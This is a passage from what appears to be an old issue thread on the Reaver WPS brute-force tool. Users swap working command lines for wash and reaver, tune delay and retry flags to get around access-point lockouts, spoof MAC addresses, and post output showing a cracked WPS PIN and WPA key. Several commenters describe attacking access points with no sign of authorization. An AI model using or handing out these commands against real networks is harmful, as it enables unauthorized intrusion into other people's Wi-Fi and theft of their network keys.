( -i : interface | -b : bssid | -c : channel | -d: delay time | )
now we r waiting the wps pin , it worked slowly, i found 70-80 minutes. that's
all...
i tried and it worked, sorry for my bad english and simple expression..
I hope, that my help is useful...
if u have some question write me on TWITTER: @yigitcomposer
and special thanks for Craig Heffner
Original comment by yigitcom...@gmail.com
on 8 Dec 2012 at 2:06
[deleted comment]
I've tried every method posted here and I'm still getting this error - (WPS
transaction failed (code: 0x02 re-trying last pin). I tried changing the
parameters. The AP I'm attacking has -55 signal strength I got to 0.55% last
time and i got the error above followed by an error which says something about
waiting for 60 seconds before trying again. I'm at my wits end with reaver tbh,
can anyone help me please.
I used the following commands:
wash -i mon0 -s -C
reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x
360
Original comment by samdoy...@googlemail.com
on 30 Dec 2012 at 10:27
itmanvn comment #17 solution worked for me! it's slow but it's at least trying
pins now. before i let it sit for 2 days and it never made it through a single
pin
Original comment by peeon...@gmail.com
on 4 Jan 2013 at 1:55
this works for me. MAC Spoofing
In some cases you may want/need to spoof your MAC address. Reaver supports MAC
spoofing with the --mac option, but you must ensure that you have spoofed your
MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named
mon0) WILL NOT WORK. You must change the MAC address of your wireless card's
physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 22763 seconds
[+] WPS PIN: '
[+] WPA PSK: '
[+] AP SSID: '
Original comment by greeneco...@gmail.com
on 30 Jan 2013 at 2:28
on 1.3 the command for no-nacks is -n not -N
Original comment by nabilalk
on 31 Mar 2013 at 3:57
Hi everyone, i tried all of the methods and it doesnt work.. Is there anyone
who can point me out the best solution for wps locks especially code: 0x2 and
code 0x03?
I would really appreciate it.
Thank you
Original comment by upicreat...@gmail.com
on 1 Mar 2014 at 10:24
#23 comment worked for me after few trial and error with -r and -d
Original comment by crisosto...@yahoo.com
on 11 Mar 2014 at 12:43
[deleted comment]
Optimal parameters for me are:
reaver -i mon0 -vv -b 00:18:E7:E7:59:4E -d 5 -r 3:15 -T .5
Original comment by nvyuew...@gmail.com
on 28 Apr 2014 at 4:42
if you seen code 0x2 and ox3 but it still continues on and checks different pins
i wouldnt worry about it let it go... you get all kinds of timeout's errors
etc.. and it still works.. it just takes along time
Original comment by 360...@gmail.com
on 7 May 2014 at 4:50
[deleted comment]
[deleted comment]
[deleted comment]
I had the same issue, and I solved by running iwconfig and actually checking
that there was not only mon0 but also mon1. When using mon0 it didn't work and
returned that error, when switched to mon1 it found the correct pin in a matter
of seconds..
"reaver -i mon1 -c CHANNEL -b BSSID -vv"
Original comment by internet...@gmail.com
on 31 Dec 2014 at 2:27
nobody seem to be able to resolve this issue
Original comment by kkchiu...@gmail.com
on 25 Jan 2015 at 12:56
Still got 0x002 problem :(
Original comment by ilkr...@gmail.com
on 3 Mar 2015 at 7:10
Ccontinuously got 0x04 error
Original comment by geiser...@gmail.com
on 23 Apr 2015 at 8:19
wps transaction failed (code: 0x03) error
plz help guys
Original comment by royalarm...@gmail.com
on 15 May 2015 at 6:20
Original issue reported on code.google.com by
m...@c0refailure.com
on 23 Jan 2012 at 5:03